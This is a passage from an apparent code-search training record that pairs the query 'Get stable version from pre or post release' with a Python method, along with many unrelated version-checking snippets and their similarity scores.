\"current_branch\":\n return \"dagster-webserver\"\n else:\n if not EARLIEST_TESTED_RELEASE:\n check.failed(\"Environment variable `$EARLIEST_TESTED_RELEASE` must be set.\")\n version = packaging.version.parse(release)\n return \"dagit\" if version < packaging.version.Version(\"1.3.14\") else \"dagster-webserver\"", "def postreleaser_before(data):\n\n data['dev_version_template'] = '%(new_version)s.dev'", "def test_version():\n assert(hasattr(tekel, '__version__'))", "def is_new_osx():\n name = distutils.util.get_platform()\n if sys.platform != \"darwin\":\n return False\n elif name.startswith(\"macosx-10\"):\n minor_version = int(name.split(\"-\")[1].split(\".\")[1])\n if minor_version >= 7:\n return True\n else:\n return False\n else:\n return False", "def firmware_outdated(self):\n datefmt = ' %b %d %Y %H:%M:%S'\n\n compat_date = self.compatible_firmware_version.split('compiled')[1]\n compat_date = datetime.datetime.strptime(compat_date, datefmt)\n\n fw_date = self.firmware_version.split('compiled')[1]\n fw_date = datetime.datetime.strptime(fw_date, datefmt)\n return (compat_date > fw_date)", "def isDBReleaseAvailable(dbh, version, lfns, jobPars):\n\n DBReleaseIsAvailable = False\n if version == \"\":\n tolog(\"Job parameters did not specify a DBRelease version (can not verify local availability)\")\n else:\n for lfn in lfns:\n if isDBReleaseFile(dbh, lfn):\n tolog(\"Found a DBRelease file in the input file list (will check local availability)\")\n\n # is the requested DBRelease file available locally?\n if dbh.isDBReleaseAvailable(version):\n tolog(\"%s is available locally (will not be staged-in)\" % (lfn))\n DBReleaseIsAvailable = True\n break\n\n return DBReleaseIsAvailable", "def is_version_sufficient(self, min_version):\n \n try:\n current_version = self.get_software_version()\n return LooseVersion(current_version) >= LooseVersion(min_version)\n except:\n raise", "def is_debian(distro):\n name = distro.lower()\n return name in debain", "def _is_released(self, lang_code):\r\n return any(lang_code.lower().startswith(released_lang.lower()) for released_lang in self.released_langs)", "def _is_version_uptodate(self):\n logging.info(\"Checking tesseract version\")\n cmd = '%s -v' % (self.binary)\n logging.info(cmd) \n try:\n ret_output = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)\n except CalledProcessError:\n # Could not run tesseract\n error(self.msgs['TS_MISSING'])\n\n ver_str = '0.0.0'\n for line in ret_output.splitlines():\n if 'tesseract' in line:\n ver_str = line.split(' ')[1]\n if ver_str.endswith('dev'): # Fix for version strings that end in 'dev'\n ver_str = ver_str[:-3]\n\n # Iterate through the version dots\n ver = [int(x) for x in ver_str.split('.')]\n req = [int(x) for x in self.required.split('.')]\n\n # Aargh, in windows 3.02.02 is reported as version 3.02 \n # SFKM\n if str(os.name) == 'nt':\n req = req[:2]\n\n version_good = False\n for i,num in enumerate(req):\n if len(ver) < i+1:\n # This minor version number is not present in tesseract, so it must be\n # lower than required. (3.02 < 3.02.01)\n break\n if ver[i]==num and len(ver) == i+1 and len(ver)==len(req):\n # 3.02.02 == 3.02.02\n version_good = True\n continue\n if ver[i]>num:\n # 4.0 > 3.02.02\n # 3.03.02 > 3.02.02\n version_good = True\n break\n if ver[i]<num:\n # 3.01.02 < 3.02.02\n break\n \n return version_good, ver_str", "def is_stable_version(version):\n if not isinstance(version, tuple):\n version = version.split('.')\n last_part = version[-1]\n\n if not re.search('[a-zA-Z]', last_part):\n return True\n else:\n return False", "def test_undefined_semver(self):\n v1 = versions.Version(version='1.2.3', name='foo')\n expected = None\n\n self.assertEqual(v1.build, expected)", "def select_release():\n release_version = unitdata.kv().get(OPENSTACK_RELEASE_KEY, None)\n if release_version is None:\n release_version = os_utils.os_release('keystone')\n unitdata.kv().set(OPENSTACK_RELEASE_KEY, release_version)\n return release_version", "def new_version_available(self):\n return self._new_version_available", "def check_version_2(dataset):\n\n if float(dataset.get('version')) >= 2.0 \\\n if dataset.get('version') else False:\n return True\n else:\n return False", "def test_is_not_local_dev_from_presence(self):\n\n expected = False\n actual = Version.is_local_dev()\n\n self.assertEqual(expected, actual)", "def get_version_comparitor(self, requirement):\n if manage.is_inhouse_package(requirement.project_name):\n if self._prefer_final:\n log.debug(' in-house package, prefer-final')\n return easy_install._final_version\n else:\n log.debug(' in-house package, prefer-dev')\n return self.is_dev_version\n else:\n log.debug(' third-party package, always prefer-final')\n return easy_install._final_version", "def test_package_version():\n coverage_version = package_version('coverage')\n pytest_version = package_version('pytest')\n\n assert coverage_version is not None\n assert coverage_version < (1000, 0, 0)\n assert pytest_version is not None\n assert pytest_version > (5, 0)", "def python_compatible():\n result = False\n req_ver = vers.convert('3.9.5')\n pythonver = vers.convert('{major}.{minor}.{micro}'.format(major=sys.version_info.major,\n minor=sys.version_info.minor,\n micro=sys.version_info.micro))\n\n result = pythonver >= req_ver\n\n return result", "def is_deprecated(self) -> bool:\n if self.properties.deprecated:\n return True\n else:\n return False", "def test_is_production_env(self) -> None:\n os.environ.update({\"NC_MODE\": \"production\"})\n is_develop = is_development_env()\n self.assertFalse(is_develop)" ]
[ "0.7988306", "0.7390222", "0.72329897", "0.71225476", "0.70509773", "0.674931", "0.67251575", "0.66882837", "0.6623015", "0.6601849", "0.65394694", "0.64932364", "0.64372605", "0.639243", "0.63218457", "0.6310093", "0.62938845", "0.6283808", "0.6193949", "0.6171282", "0.60062796", "0.59985715", "0.59855986", "0.5979206", "0.5974908", "0.5971468", "0.59625405", "0.59610367", "0.5926642", "0.5908074", "0.5887973", "0.58862406", "0.58709323", "0.5869047", "0.58668804", "0.58635104", "0.58525807", "0.5851847", "0.58483344", "0.5845308", "0.58339125", "0.58290017", "0.58220255", "0.5820977", "0.58156407", "0.58006877", "0.57865053", "0.5783296", "0.57519835", "0.5749093", "0.5748391", "0.5747629", "0.5737114", "0.573557", "0.57279325", "0.57246256", "0.5723739", "0.56952953", "0.56951195", "0.5670077", "0.5667306", "0.56537515", "0.5650566", "0.5644464", "0.5643122", "0.5633318", "0.5630934", "0.56291276", "0.5624534", "0.5621977", "0.5619409", "0.5598538", "0.5582609", "0.55791783", "0.557526", "0.55744225", "0.556737", "0.55631566", "0.55626386", "0.55423594", "0.5540424", "0.5539596", "0.5532133", "0.5527763", "0.55272686", "0.5524132", "0.5514627", "0.55106163", "0.55016744", "0.5499714", "0.54818743", "0.54778945", "0.5477099", "0.5457959", "0.5450665", "0.5447296", "0.5442166", "0.5441259", "0.54285276", "0.5425926" ]
0.7183544
3
Get stable version from pre or post release.
def get_stable(self: _R) -> _R: return self._replace( BaseVersion( epoch=0, release=(self.major, self.minor, self.micro), pre=None, post=None, dev=None, local=None, ) )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def next_version(major=False, minor=False, patch=True):\n try:\n r = Release.objects.latest()\n except Release.DoesNotExist:\n return Version('0.0.0')\n\n v = r.version\n if major:\n v = v.next_major()\n elif minor:\n v = v.next_minor()\n else:\n v = v.next_patch()\n return v", "def get_version():\n return \"0.0.1 (prerelease prototype)\"", "def current_version(self):\n try:\n return self.release_set.order_by('-created')[0].version\n except IndexError:\n return \"0.0.0\"", "def is_release():\n return VERSION[-1]", "def get_prerelease_package_version(self, production: bool = False) -> str:\n rc = 1\n if describe := get_git_describe(CONFIG.mpy_path.as_posix()):\n ver, rc, _ = describe.split(\"-\")\n base = bump_version(Version(ver), minor_bump=True)\n rc = int(rc)\n return str(bump_version(base, rc=rc))\n else:\n raise ValueError(\"cannot determine next version number micropython\")", "def stable():\n env.branch = 'stable'", "def get_release(self, is_vertebrate: bool) -> int:\n ext = \"/info/data/?\" if is_vertebrate else \"/info/eg_version?\"\n ret = retry(request_json, 3, self._url, ext)\n return int(ret[\"releases\"][0] if is_vertebrate else ret[\"version\"])", "def next_version(self):\n try:\n release = self.release_set.order_by('-created')[0]\n except IndexError:\n return \"0.1.0\"\n\n major, minor, bugfix = release.version.split(\".\")\n\n return \"{}.{}.{}\".format(major, int(minor) + 1, bugfix)", "def test_request_estable_version(self):\n current_stable_version = get_stable_version()\n self.assertIsNotNone(current_stable_version)", "def get_latest_release_version():\n repo = GITHUB.get_user(GITHUB_OWNER).get_repo(GITHUB_REPO)\n latest_release_version = repo.get_latest_release().tag_name\n return latest_release_version", "def get_next_package_version(self, prod: bool = False) -> str:\n base = Version(self.pkg_version)\n if pypi_versions := get_pypi_versions(self.package_name, production=prod, base=base):\n self.pkg_version = str(pypi_versions[-1])\n return self.bump()", "def get_version():\n git_root = find_git_root(dirname(__file__))\n\n if git_root is not None:\n # Get the version using \"git describe\".\n cmd = \"git describe --tags --match [0-9]*\".split()\n try:\n version = subprocess.check_output(cmd).decode().strip()\n except subprocess.CalledProcessError:\n logger.exception(\"Unable to get version number from git tags\")\n exit(1)\n\n # PEP 386 compatibility\n if \"-\" in version:\n version = \".post\".join(version.split(\"-\")[:2])\n\n # Don't declare a version \"dirty\" merely because a time stamp has\n # changed. If it is dirty, append a \".dev1\" suffix to indicate a\n # development revision after the release.\n with open(os.devnull, \"w\") as fd_devnull:\n subprocess.call([\"git\", \"status\"], stdout=fd_devnull, stderr=fd_devnull)\n\n cmd = \"git diff-index --name-only HEAD\".split()\n try:\n dirty = subprocess.check_output(cmd).decode().strip()\n except subprocess.CalledProcessError:\n logger.exception(\"Unable to get git index status\")\n exit(1)\n\n if dirty != \"\":\n version += \".dev1\"\n\n return version\n\n else:\n try:\n return pkg_resources.working_set.by_key[\"graphql-validate\"].version\n except KeyError:\n return \"0.0.0-unreleased\"", "def get_current_release():\n return _CURRENT_RELEASE", "def select_release():\n release_version = unitdata.kv().get(OPENSTACK_RELEASE_KEY, None)\n if release_version is None:\n release_version = os_utils.os_release('keystone')\n unitdata.kv().set(OPENSTACK_RELEASE_KEY, release_version)\n return release_version", "def is_stable(self) -> bool:\n return not self.is_prerelease", "def get_increased_version():\n logs = get_rolling_log_history()\n\n if has_breaking_changes(logs):\n return get_increased_base_version(0)\n if has_features(logs):\n return get_increased_base_version(1)\n if has_fixes(logs):\n return get_increased_base_version(2)", "def test_release_tag_for_dev_version(self) -> None:\n self.assertEqual(\"v42.12\", release_tag())", "def get_base_version():\n if BASE_VERSION is None:\n return shell_output('git describe --tags --abbrev=0')\n return BASE_VERSION", "def get_version():\n return 1", "def get_latest_version(self):\n latest_release = self._http_client.get(self._github_repo + '/releases/latest')\n if not 'tag_name' in latest_release.json():\n return None\n version = latest_release.json()['tag_name']\n latest_release.close()\n return version", "def latest_version(self):\n state = self.coordinator.data\n\n try:\n # fake a new update\n # return \"foobar\"\n return dict_get(state, \"firmware_update_info.base.version\")\n except KeyError:\n return None", "def get_release_info(version='v1.1-dev', date='2021-07-22'):\n # go to the repository directory\n dir_orig = os.getcwd()\n os.chdir(os.path.dirname(os.path.dirname(__file__)))\n\n # grab git info into string\n try:\n cmd = \"git describe --tags\"\n version = subprocess.check_output(cmd.split(), stderr=subprocess.DEVNULL)\n version = version.decode('utf-8').strip()\n\n # if there are new commits after the latest release\n if '-' in version:\n version, num_commit = version.split('-')[:2]\n version += '-{}'.format(num_commit)\n\n cmd = \"git log -1 --date=short --format=%cd\"\n date = subprocess.check_output(cmd.split(), stderr=subprocess.DEVNULL)\n date = date.decode('utf-8').strip()\n except:\n pass\n\n # go back to the original directory\n os.chdir(dir_orig)\n return version, date", "def get_new_version(version, IS_ARCHIVE, IS_RELEASE):\n\n if not IS_ARCHIVE and not IS_RELEASE:\n return version\n\n version_split = version.split('.')\n version_split_sigfigs = len(version_split)\n\n # ARCHIVE\n if IS_ARCHIVE:\n if version_split_sigfigs == 2:\n version_split[1] = str(0)\n else:\n del version_split[-1]\n version = \".\".join(version_split)\n return version\n\n # Release\n else:\n version_split[version_split_sigfigs-1] = str(int(version_split[version_split_sigfigs-1]) + 1)\n return \".\".join(version_split)", "def get_git_version(abbrev=4):\n # Read in the version that's currently in RELEASE-VERSION.\n release_version = read_release_version()\n\n # First try to get the current version using \"git describe\".\n tag, count, _ = call_git_describe(abbrev)\n\n if count == '0':\n if tag:\n # Normal tagged release\n version = tag\n else:\n # This is an odd case where the git repo/branch can't find a tag\n version = \"0.dev0\"\n elif count:\n # Non-zero count means a development release after the last tag\n version = \"{}.dev{}\".format(tag, count)\n else:\n # Build count wasn't returned at all. Fall back on the value that's in\n # the packaged RELEASE-VERSION file\n version = release_version\n\n # If the current version is different from what's in the\n # RELEASE-VERSION file, update the file to be current.\n if version != release_version:\n write_release_version(version)\n\n # Finally, return the current version.\n return version", "def increment(version):\n release_version = os.environ.get(\"RELEASE_VERSION\", None)\n if release_version is not None:\n return release_version\n if isinstance(version, LegacyVersion):\n msg = \"\"\"{0} is considered a legacy version and does not\n support automatic incrementing. Please bring your version\n numbering into PEP440 standards and then it can be\n automatically incremented.\n \"\"\"\n raise Exception(msg.format(version))\n release_type = os.environ.get(\"RELEASE_TYPE\", \"micro\")\n v = version._version\n # epoch\n epoch_name, epoch = VersionUtils.get_version_number(v, 0, None, \"!\")\n pre_name, pre = VersionUtils.get_version_number(v, 3, None, \"pre\")\n post_name, post = VersionUtils.get_version_number(v, 4, None, \"post\")\n dev_name, dev = VersionUtils.get_version_number(v, 2, None, \"dev\")\n _, major = VersionUtils.get_version_number(v[1], 0, 0)\n _, minor = VersionUtils.get_version_number(v[1], 1, None)\n _, micro = VersionUtils.get_version_number(v[1], 2, None)\n\n # Handle dev/pre/post\n if release_type == \"pre\":\n micro, post, pre = VersionUtils.process_pre(micro, post, pre)\n\n if release_type == \"post\":\n dev, post = VersionUtils.process_post(dev, post)\n\n if release_type == \"dev\":\n dev = VersionUtils.process_dev(dev)\n\n if release_type == \"micro\":\n dev, micro, minor, post, pre = VersionUtils.process_micro(\n dev, micro, minor, post, pre\n )\n\n if release_type == \"minor\":\n dev, micro, minor, post, pre = VersionUtils.process_minor(\n dev, micro, minor, post, pre\n )\n\n if release_type == \"major\":\n dev, major, micro, minor, post, pre = VersionUtils.process_major(\n dev, major, micro, minor, post, pre\n )\n\n # Handle Epoch\n if release_type == \"epoch\":\n dev, epoch, major, micro, minor, post, pre = VersionUtils.process_epoch(\n dev, epoch, major, micro, minor, post, pre\n )\n\n local = \"\".join(v[5] or []) or None\n\n version_list = [major, minor, micro]\n if release_type not in [\"epoch\", \"major\", \"minor\", \"micro\", \"pre\"]:\n version_list += list(v[1][3:])\n version_string = \".\".join([str(x) for x in version_list if x or x == 0])\n\n if epoch:\n version_string = str(epoch) + epoch_name + version_string\n if pre is not None:\n version_string = VersionUtils.calc_pre_version_string(\n pre, pre_name, version_string\n )\n if post is not None:\n version_string += \".\" + post_name + str(post)\n if dev is not None:\n version_string += \".\" + dev_name + str(dev)\n if local is not None:\n version_string += \".\" + str(local)\n\n return version_string", "def get_version():\n\n with open('__init__.py') as f:\n for line in f.readlines():\n if '__version__' in line:\n apicem_version = line.strip().split(\"=\")[-1].strip(\" '\")\n if '__first_release_date__' in line:\n first_release_data_str = line.strip().split(\"=\")[-1].strip(\" '\")\n first_release_data = date(*[int(num) for num in first_release_data_str.split('.')])\n num_commits = get_cr_num(first_release_data)\n return '{apicem_version}.{num_commits}'.format(\n apicem_version=apicem_version, num_commits=num_commits)\n\n raise ValueError(\"could not read version\")", "def get_distrib_version():\n distrib, version, codename = _get_release_infos() \n return version", "def latest_release_get():\n try:\n return json_response.success({'version': version.latest_version()})\n except version.Error as e:\n return json_response.error(str(e)), 200", "def get_version():\n click.echo(get_current_version_number())", "def test_beta_to_stable(self):\n self.change_version(self.version_1_2_0, '1.2beta')\n self.change_status(self.version_1_2_0, amo.STATUS_BETA)\n\n version, file = self.get('1.2beta', self.version_int,\n self.app, self.platform)\n assert version == self.version_1_2_2", "def get_github_library_version(name, url):\n while True:\n # For the release, make sure the default versions do not include \"-dev\"\n version = raw_input(\"Version of %s?: \" % name)\n if not url_exists(\"%s/releases/tag/%s\" % (url, version)):\n print_warning(\"The version of %s is not valid. Ensure you've chosen a correct value by checking the \"\n \"GitHub releases for exact naming at \"\n \"%s/releases before you continue.\" % (name, url))\n return version", "def get_version(version=None):\n if version is None:\n version = VERSION\n assert len(version) == 5\n assert version[3] in (\"alpha\", \"beta\", \"rc\", \"final\")\n\n parts = 2 if version[2] == 0 else 3\n main = \".\".join(str(digit) for digit in version[:parts])\n\n sub = \"\"\n if version[3] != \"final\":\n mapping = {\"alpha\": \"a\", \"beta\": \"b\", \"rc\": \"rc\"}\n sub = mapping[version[3]] + str(version[4])\n\n return main + sub", "def current_version(self):\n if self.current_tag:\n version = self.current_tag.lstrip('v')\n else:\n version = None\n\n if version and not version_is_valid(version):\n version = None\n\n return version", "def getversion(online: bool = True) -> str:\n branches = {\n 'master': 'branches/master',\n 'stable': 'branches/stable',\n }\n data = getversiondict()\n data['cmp_ver'] = 'n/a'\n local_hsh = data.get('hsh', '')\n hsh = {}\n\n if online:\n if not local_hsh:\n data['cmp_ver'] = 'UNKNOWN'\n else:\n for branch, path in branches.items():\n with suppress(Exception):\n hsh[getversion_onlinerepo(path)] = branch\n if hsh:\n data['cmp_ver'] = hsh.get(local_hsh, 'OUTDATED')\n\n data['hsh'] = local_hsh[:7] # make short hash from full hash\n return '{tag} ({hsh}, {rev}, {date}, {cmp_ver})'.format_map(data)", "def bump_postrelease(self: _R, inc: int = 1) -> _R:\n post = (VersionParts.POST, max(inc, 1))\n base_post: Optional[Tuple[str, int]] = self._version.post\n if base_post:\n post = (VersionParts.POST, max(base_post[1], 1) + inc)\n base = BaseVersion(\n epoch=0,\n release=self._version.release,\n pre=None,\n post=post,\n dev=None,\n local=None,\n )\n return self._replace(base)", "def get_version():\n return '%d.%d.%d' % version_info", "def GetApiVersion(cls):\n if cls.ReleaseTrack() == base.ReleaseTrack.ALPHA:\n return 'alpha'\n elif cls.ReleaseTrack() == base.ReleaseTrack.BETA:\n return 'beta'\n return 'v1'", "def getversion(): # 3\n res,resargs = _msk.Env.getversion()\n if res != 0:\n raise Error(rescode(res),\"\")\n _major_return_value,_minor_return_value,_build_return_value,_revision_return_value = resargs\n return _major_return_value,_minor_return_value,_build_return_value,_revision_return_value", "def get_latest_version(self):\n try:\n version = self.sourcestudyversion_set.filter(\n i_is_deprecated=False\n ).order_by( # We can't use \"latest\" since it only accepts one field in Django 1.11.\n '-i_version',\n '-i_date_added'\n ).first()\n except ObjectDoesNotExist:\n return None\n return version", "def get_latest_release(self):\n cs = Custom_Soup(\n \"latest_release\", \"https://chromedriver.storage.googleapis.com/LATEST_RELEASE_\" + str(self.version))\n cs.get_request()\n self.latest_release = cs.get_text()", "def compute_version_for_latest(project_name, org_name, repo_name, distro_name):\n #TODO: update for h turtle\n assert distro_name in ['fuerte', 'groovy']\n if distro_name == 'fuerte':\n release = 'lucid'\n else:\n release = 'precise'\n project_name = project_name.replace('_', '-')\n prefix = 'debian/ros-%s-%s_'%(distro_name, project_name)\n suffix = '_%s'%(release)\n tags = list_tags(org_name, repo_name, prefix)\n tags = [t[:-len(suffix)] for t in tags if t.endswith(suffix)]\n if not tags:\n return None\n print(\"TAGS\", [t[len(prefix):] for t in tags])\n \n versions = sorted([distutils.version.LooseVersion(t[len(prefix):]) for t in tags])\n if not versions:\n return None\n version = versions[-1].vstring #for pattern\n return '%s%s%s'%(prefix, version, suffix)", "def update_pkg_version(self, production: bool) -> str:\n return (\n self.get_prerelease_package_version(production) if self.mpy_version == \"latest\" else self.get_next_package_version(production)\n )", "def __getattr__(self, name):\n if name in ('epoch', 'release', 'pre', ):\n return getattr(self._version, name)\n if name in ('post', 'dev'):\n attr = getattr(self._version, name)\n return attr[1] if attr else None\n if name == 'is_devrelease':\n return self.dev is not None\n\n parts = ('major', 'minor', 'micro')\n try:\n index = parts.index(name)\n except ValueError:\n raise AttributeError('{!r} object has to attribute {!r}'\n .format(type(self).__name__, name)) from None\n release = self.release\n return release[index] if len(release) >= index + 1 else 0", "def get_version():\n return __version__", "def get_version():\n return __version__", "def get_version():\n return __version__", "def test_pre_release(scraper, version_parts):\n\n new_version_parts = list(version_parts)\n if len(new_version_parts) > 4:\n new_version_parts[4] = int(new_version_parts[4]) + 1\n elif len(new_version_parts) > 3:\n new_version_parts.append(1)\n else:\n new_version_parts.extend(['a', 1])\n\n assert scraper.is_compatible_with(generate_version(new_version_parts)) is True", "async def fetch_data(self) -> GitHubReleaseModel | None:\n result = await self._client.repos.releases.list(\n self.repository, **{\"params\": {\"per_page\": 1}}\n )\n if not result.data:\n return None\n\n for release in result.data:\n if not release.prerelease:\n return release\n\n # Fall back to the latest release if no non-prerelease release is found\n return result.data[0]", "def get_version():\n vers = [\"%(major)i.%(minor)i\" % __version_info__, ]\n\n if __version_info__['micro']:\n vers.append(\".%(micro)i\" % __version_info__)\n if __version_info__['releaselevel'] != 'final':\n vers.append('%(releaselevel)s' % __version_info__)\n return ''.join(vers)", "def getDBReleaseVersion(dbh, jobPars):\n\n return dbh.getDBReleaseVersion(jobPars=jobPars)", "def update_version() -> str:\n cur_version = get_current_version(args.stage)\n\n if args.stage == \"prod\":\n prv_version = get_current_version(stage='staging')\n new_version = semver.finalize_version(prv_version)\n elif args.stage == \"staging\":\n prv_version = get_current_version(stage='integration')\n assert '-integration' in prv_version\n new_version = prv_version.replace('-integration', '-rc') # don't bump the version number\n else:\n new_version = getattr(semver, f'bump_{args.release}')(str(cur_version))\n new_version = new_version if semver.parse_version_info(new_version).prerelease \\\n else semver.bump_prerelease(new_version, token='integration')\n\n if cur_version == new_version:\n print(\"Nothing to promote\")\n exit(0)\n else:\n print(f\"Upgrading: {cur_version} -> {new_version}\")\n return new_version", "def get_version():\r\n return __version__", "def get_sg_jira_bridge_version():\n # Note: if you install from a cloned git repository\n # (e.g. pip install ./tk-core), the version number\n # will be picked up from the most recently added tag.\n try:\n version_git = subprocess.check_output(\n [\"git\", \"describe\", \"--abbrev=0\"]\n ).rstrip()\n return version_git\n except Exception:\n # Blindly ignore problems. Git might be not available, or the user may\n # have installed via a zip archive, etc...\n pass\n\n return \"dev\"", "def get_revision(self):\n vers = self.send(\"?R\", recv=True)\n # Verify its a valid version\n # ? why was this commented out\n float(vers)\n # But return as string to avoid precision issues\n return vers", "def _get_version(self):", "def get_latest_schemaorg_version():\n tag_name = requests.get(SCHEMAORG_VERSION_URL).json()[\"tag_name\"] # \"v13.0-release\"\n mat = re.match(r\"v([\\d.]+)-release\", tag_name)\n if not mat:\n raise ValueError(f\"Unrecognized release tag name {tag_name}\")\n latest = mat.group(1)\n return latest", "def get_revision(self) -> str:\n try:\n return self.cmd.rev_parse(verify=True, args=\"HEAD\", check_returncode=True)\n except exc.CommandError:\n return \"initial\"", "def read_release_version():\n with open(\"RELEASE-VERSION\", \"r\") as f:\n return f.readline().strip()", "def test_beta_updates_to_stable(self):\n self.change_version(self.version_1_2_0, '1.2beta')\n self.change_status(self.version_1_2_0, amo.STATUS_BETA)\n self.change_status(self.version_1_2_2, amo.STATUS_BETA)\n\n version, file = self.get('1.2beta', self.version_int,\n self.app, self.platform)\n assert version == self.version_1_2_1", "def get_previous_release_info(\n previous_release_version: str | None, past_releases: list[ReleaseInfo], current_release_version: str\n) -> str | None:\n previous_release = None\n if previous_release_version == current_release_version:\n # Re-running for current release - use previous release as base for git log\n if len(past_releases) > 1:\n previous_release = past_releases[1].last_commit_hash\n else:\n previous_release = past_releases[0].last_commit_hash if past_releases else None\n return previous_release", "def semver_from(changelog: Path) -> Version:\n with open(changelog) as f:\n matches = SEMVER_RE.finditer(f.read())\n versions: List[Version] = []\n is_unreleased = False\n for match in matches:\n version = match.groupdict()[\"version\"]\n if version.lower() == \"unreleased\":\n is_unreleased = True\n else:\n versions.append(Version.parse(version))\n\n versions.sort()\n latest = versions[-1]\n print(latest)\n return latest.bump_prerelease() if is_unreleased else latest", "def get_build_version():\n package_version = __version__\n tags = (\n subprocess.run(\n [\"/usr/bin/git\", \"tag\", \"--points-at\", \"HEAD\"],\n cwd=os.path.dirname(os.path.realpath(__file__)),\n stdout=subprocess.PIPE,\n check=True,\n )\n .stdout.decode(\"utf-8\")\n .strip(\"\\n\")\n .split(\"\\n\")\n )\n commit_id = (\n subprocess.run(\n [\"/usr/bin/git\", \"rev-parse\", \"--short\", \"HEAD\"],\n cwd=os.path.dirname(os.path.realpath(__file__)),\n stdout=subprocess.PIPE,\n check=True,\n )\n .stdout.decode(\"utf-8\")\n .strip(\"\\n\")\n )\n\n version_tags = _select_version_tags(tags)\n if len(version_tags) > 1:\n raise exc.QgrVersionError(\n f\"Can not determine desired version from tags: {tags}\",\n )\n\n if len(version_tags) == 1:\n version = version_tags[0]\n else:\n # If there is no version tag, build a unique version string\n version = f\"{package_version}-{commit_id}\"\n\n return version", "def test_changeVersionsWithPrerelease(self):\n self._testVersionChanging(9, 2, 7, 38)", "def make_semver(repo_root, build_number):\n branch_name, sha, tags = parse_describe(repo_root)\n if tags:\n # There are git tags to consider. Parse them all then choose the one that is latest (sorted by semver rules)\n return sorted([make_version_number(branch_name, build_number, tag, sha) for tag in tags])[-1]\n else:\n return make_version_number(branch_name, build_number, None, sha)", "def test_finder_installs_pre_releases(data: TestData) -> None:\n\n req = install_req_from_line(\"bar\")\n\n # using a local index (that has pre & dev releases)\n finder = make_test_finder(\n index_urls=[data.index_url(\"pre\")],\n allow_all_prereleases=True,\n )\n found = finder.find_requirement(req, False)\n assert found is not None\n assert found.link.url.endswith(\"bar-2.0b1.tar.gz\"), found.link.url\n\n # using find-links\n links = [\"https://foo/bar-1.0.tar.gz\", \"https://foo/bar-2.0b1.tar.gz\"]\n\n finder = make_test_finder(links, allow_all_prereleases=True)\n found = finder.find_requirement(req, False)\n assert found is not None\n assert found.link.url == \"https://foo/bar-2.0b1.tar.gz\"\n\n links.reverse()\n\n finder = make_test_finder(links, allow_all_prereleases=True)\n found = finder.find_requirement(req, False)\n assert found is not None\n assert found.link.url == \"https://foo/bar-2.0b1.tar.gz\"", "def detect_version(self):\n\n version = self.scm_object.detect_version(self.args.__dict__).strip()\n logging.debug(\"VERSION(auto): %s\", version)\n return version", "def test_release_update_available_MAJOR(self):\n NEXT = '%d.%d-%d' % (MAJOR + 1, 0, 0)\n self._uri({\n '%d.%d/maintained/%s/all/Packages.gz' % (MAJOR + 1, 0, NEXT): DATA,\n })\n next = self.u.release_update_available()\n self.assertEqual(NEXT, next)", "def get_dev_version(self, increment_part):\n self.project.set_property(\n 'semver_git_tag_increment_part', increment_part)\n set_version_from_git_tag(self.project, self.logger)", "def _get_version():\n try:\n code, output = _run_cmd('git', 'describe', '--tags')\n if code:\n return 'unknown'\n output = output.decode('utf8').strip().split('-')\n if len(output) != 3:\n return 'unknown'\n version = '%s+%s' % (output[0], output[2])\n\n code, _ = _run_cmd('git', 'diff', '--quiet')\n if code:\n version += '+dirty'\n\n return version\n except OSError:\n return 'unknown'", "def getversion():\r\n\r\n global VERSION\r\n\r\n if len(VERSION) == 3:\r\n return '{}.{}.{}'.format(VERSION[0], VERSION[1], VERSION[2])\r\n else:\r\n return '{}.{}.{}-{}'.format(VERSION[0], VERSION[1], VERSION[2], VERSION[3])", "def get_comp_versions (component):\n vprint (\"Detecting current version for \" + component)\n\n regex = re.compile (r\"version \" + version_restr)\n major = component + \"_major\"\n minor = component + \"_minor\"\n micro = component + \"_micro\"\n\n\n version = (None, None, None)\n with open (doc_root + \"/ACE_TAO/\" + component + \"/VERSION.txt\") as version_file:\n for line in version_file:\n match = regex.search (line)\n if match is not None:\n version = match.groups(default=0)\n\n vprint (\"Detected version %s.%s.%s\" % version)\n\n comp_versions[major] = int (version[0])\n comp_versions[minor] = int (version[1])\n comp_versions[micro] = int (version[2])\n\n break\n\n print (\"FATAL ERROR: Unable to locate current version for \" + component)\n raise Exception\n\n # Also store the current release (old from now)\n old_comp_versions[major] = comp_versions[major]\n old_comp_versions[minor] = comp_versions[minor]\n old_comp_versions[micro] = comp_versions[micro]\n\n if opts.update:\n if opts.release_type == ReleaseType.major:\n comp_versions[major] += 1\n comp_versions[minor] = 0\n comp_versions[micro] = 0\n elif opts.release_type == ReleaseType.minor:\n comp_versions[minor] += 1\n comp_versions[micro] = 0\n elif opts.release_type == ReleaseType.micro:\n comp_versions[micro] += 1\n\n def make_version (versions, joiner):\n return joiner.join ([\n str (versions[component + '_' + x]) for x in ReleaseType.__members__.keys ()\n ])\n\n comp_versions [component + \"_version\"] = make_version (comp_versions, '.')\n comp_versions [component + \"_version_\"] = make_version (comp_versions, '_')\n\n comp_versions [component + \"_code\"] = \\\n (comp_versions[major] << 16) + \\\n (comp_versions[minor] << 8) + \\\n comp_versions[micro]\n\n old_comp_versions [component + \"_version\"] = make_version (old_comp_versions, '.')\n old_comp_versions [component + \"_version_\"] = make_version (old_comp_versions, '_')\n\n if opts.update:\n vprint (\"Updating from version %s to version %s\" %\n (old_comp_versions [component + \"_version\"], comp_versions [component + \"_version\"]))\n else:\n vprint (\"Found version %s\" %\n (comp_versions [component + \"_version\"]))\n\n # else:\n # comp_versions [component + \"_version\"] = \\\n # str (comp_versions[major]) + '.' + \\\n # str (comp_versions[minor])", "def get_version_string():\n major, minor, micro, patch, tag, relnum, is_release = VERSION\n\n version = '%s.%s' % (major, minor)\n\n if micro or patch:\n version += '.%s' % micro\n\n if patch:\n version += '.%s' % patch\n\n if tag != 'final':\n if tag == 'rc':\n version += ' RC'\n else:\n version += ' %s ' % tag\n\n version += '%s' % relnum\n\n if not is_release:\n version += ' (dev)'\n\n return version", "def kever(self):\n return self.kevers[self.pre] if self.pre else None", "def main(self):\n logging.info(\"Doing release for %s\", self.version.raw)\n\n if self.version.branch is None:\n logging.debug(\"No branch, assuming '%s'. Override with --branch.\",\n self.options.branch)\n self.version.branch = self.options.branch\n\n # No version specified, assuming a snapshot release\n if self.options.version is None:\n self.do_release(\n version=MwVersion.new_snapshot(self.options.branch))\n return 0\n\n if self.options.previousversion:\n # Given the previous version on the command line\n self.do_release(version=self.version)\n return 0\n\n no_previous = False\n if self.version.prev_version is None:\n 